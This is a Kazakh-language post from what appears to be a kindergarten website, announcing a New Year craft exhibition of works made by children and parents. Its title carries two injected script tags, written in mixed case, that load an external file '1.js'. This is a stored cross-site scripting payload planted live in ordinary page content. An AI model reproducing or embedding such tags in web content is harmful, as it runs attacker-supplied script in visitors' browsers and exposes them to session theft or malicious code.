«Таңғажайып көрме: ерекше және әдемі»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

24.12.2020

Қыс- жыл мезгілінің  тамаша уақыты! Қыстың  аязды қарлы сұлулығына қарап, тек жақсылық жасағың  келеді!

   Жыл сайын желтоқсан айында біздің бөбекжай  бақшасында жаңа жылдық қолөнер көрмесі өтеді. Биылғы жылы көрме «Таңғажайып көрме: ерекше және әдемі» деген тақырыпта  өтті. Көрмеде  ерекше туындыларды көруге болады!

     Бұл көрме әсіресе балалар мен ата – аналар үшін өте қызықты болды: түрлі шыршалар, көңілді аққалалар, қарлы үйлер атты туындылардың барлығы балалар мен ата-аналардың қолымен жасалған.

    Отбасылық шығармашылық және жаңа жылдық қысқы сюжеттер бөбекжай бақшаның фойесін безендіріп, жаңа жылдық интерьерге қайталанбас элемент енгізді.

   Ата-аналарға   шығармашылық белсенділіктері мен таусылмас қиялдары үшін үлкен алғыс білдіреміз! Көрмеге өз қолөнерін бұйымдарын  ұсынған ата-аналарға үлкен рахмет айтамыз!

 

Просмотров: 326


Пікір қосу



Деректерді қолтаңбаға қосу
Текст